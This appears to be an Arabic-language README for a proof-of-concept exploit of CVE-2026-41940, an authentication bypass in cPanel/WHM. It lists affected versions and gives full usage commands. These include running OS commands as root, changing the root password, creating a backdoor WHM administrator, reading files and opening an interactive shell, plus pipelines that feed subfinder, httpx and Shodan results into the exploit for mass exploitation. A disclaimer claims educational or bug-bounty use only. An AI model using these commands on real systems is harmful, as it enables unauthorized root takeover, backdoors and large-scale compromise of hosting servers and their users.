
يستغل CVE-2026-41940، وهو تجاوز للمصادقة في cPanel/WHM، للحصول على وصول root إلى WHM وتنفيذ أوامر ما بعد الاستغلال، وسرد الحسابات، وجلسات shell تفاعلية.
⚠ تم إنشاء هذه الأداة لغرض تعليمي أو لأغراض bug bounty فقط. يُحظر تمامًا الاستخدام غير المصرح به خارج البيئات الخاضعة للسيطرة.
أداة لاستغلال CVE-2026-41940، وهو تجاوز حرج للمصادقة في cPanel & WHM (CVSS 10.0)، يسمح للمهاجمين غير المصادق عليهم بالحصول على وصول WHM بمستوى root عبر حقن تسلسلات CRLF في ملفات الجلسة من جانب الخادم من خلال ترويسة Authorization — دون الحاجة إلى بيانات اعتماد.
يُستغل CVE-2026-41940، بعبارات عامة، من خلال خلل في كيفية تعامل النظام مع جلسات المصادقة في cPanel/WHM. يبدأ الهجوم عادةً بطلب عادي إلى واجهة تسجيل الدخول، حيث يقوم التطبيق بتهيئة جلسة قبل التحقق الكامل من بيانات اعتماد المستخدم. وبسبب المعالجة غير السليمة للمدخلات المتعلقة بالجلسة، يمكن لبعض هياكل المدخلات المصممة أو غير المتوقعة أن تغيّر كيفية تخزين بيانات الجلسة أو تفسيرها من قبل الخادم.
| الإصدار | قابل للاستغلال | مُصحّح |
|---|
| 110.x | ≤ 11.110.0.96 | 11.110.0.97 |
| 118.x | ≤ 11.118.0.62 | 11.118.0.63 |
| 126.x | ≤ 11.126.0.53 | 11.126.0.54 |
| 132.x | ≤ 11.132.0.28 | 11.132.0.29 |
| 134.x | ≤ 11.134.0.19 | 11.134.0.20 |
| 136.x | ≤ 11.136.0.4 | 11.136.0.5 |
git clone https://github.com/ctdal/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows
python cve.py
# MacOS/Linux
python3 cve.py
تتوقع الأداة تحديد نطاق هدف.
وضع الهدف الواحد:
python cve.py -u https://target1.com:2083
يمكنك أيضًا الفحص من ملف target.txt (أنشئه):
python cve.py -l target.txt -t 50 -o result.json
الأوامر المتاحة:
python cve.py -u https://victim1.com:2083 # فحص هدف واحد
python cve.py info -u https://victim1.com:2083 # استرجاع معلومات النظام (الإصدار، الحمل، استخدام القرص).
python cve.py host -u https://victim1.com:2083 # استرجاع اسم المضيف للخادم الهدف.
# سرد جميع الحسابات على الخادم
python cve.py list -u https://target.com:2087
# أمر نظام التشغيل
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"
# الحصول على معلومات الخادم (اسم المضيف، القرص، مضيف MySQL)
python cve.py info -u https://target.com:2087
# تغيير كلمة مرور root
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'
# صدفة WHM تفاعلية
python cve.py shell -u https://target.com:2087
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
httpx -silent -ports 2085,2086 -threads 50 | \
python cve.py scan -t 40 -o results.json
# من قائمة النطاق
cat scope.txt | \
httpx -silent -ports 2085,2086 -threads 100 | \
python cve.py scan -t 30 -o results.json
# نتائج Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | \
python cve.py -t 30 -o shodan_results.json
# مصادر متعددة مجتمعة
{ subfinder -d victim.com -silent; cat extra.txt; } | \
httpx -silent -ports 2087 | \
python cve.py -t 20 --action list
بعد تنفيذ ناجح، يمكنك فتح صدفة WHM تفاعلية:
python cve.py shell -u
| الأمر | الوصف |
|---|---|
id | عرض معرّف المستخدم |
hostname | الحصول على اسم مضيف الخادم |
accounts | سرد جميع حسابات المستخدمين |
info | الحمل، القرص، مضيف MySQL، الإصدار |
cat <path> | قراءة محتوى ملف |
exec <cmd> | تنفيذ أمر نظام التشغيل |
newadmin <user> <pass> | إنشاء مسؤول WHM خلفي |
passwd <pass> | تغيير كلمة مرور root |
l [path] | سرد محتويات الدليل |
help | عرض جميع الأوامر |
exit | الخروج من وضع الصدفة |
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
[-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
[--action ACTION] [--passwd PASS] [--cmd CMD]
[--new-user USER] [--new-domain DOMAIN]
[-o OUTPUT]
Target:
-u, --url URL Single target URL (e.g. https://host:2087)
-l, --list LIST File with URLs (one per line)
--hostname HOSTNAME Override canonical Host header (auto-discovered)
Scan:
-t, --threads N Concurrent threads (default: 10)
--timeout N Request timeout seconds (default: 15)
--rate-limit N Delay between targets (default: 0)
--force Skip cPanel detection check
Post-Exploit:
--action ACTION Action: list | passwd | cmd | exec | info |
version | shell | adduser
--passwd PASS New root password (--action passwd)
--cmd CMD OS command (--action cmd/exec)
--new-user USER New cPanel username (--action adduser)
--new-domain DOMAIN New cPanel domain (--action adduser)
Output:
-o, --output FILE Save results to JSON file
--no-color Disable ANSI colors
⚠ تم إنشاء هذه الأداة لغرض تعليمي أو لأغراض bug bounty فقط. يُحظر تمامًا الاستخدام غير المصرح به خارج البيئات الخاضعة للسيطرة.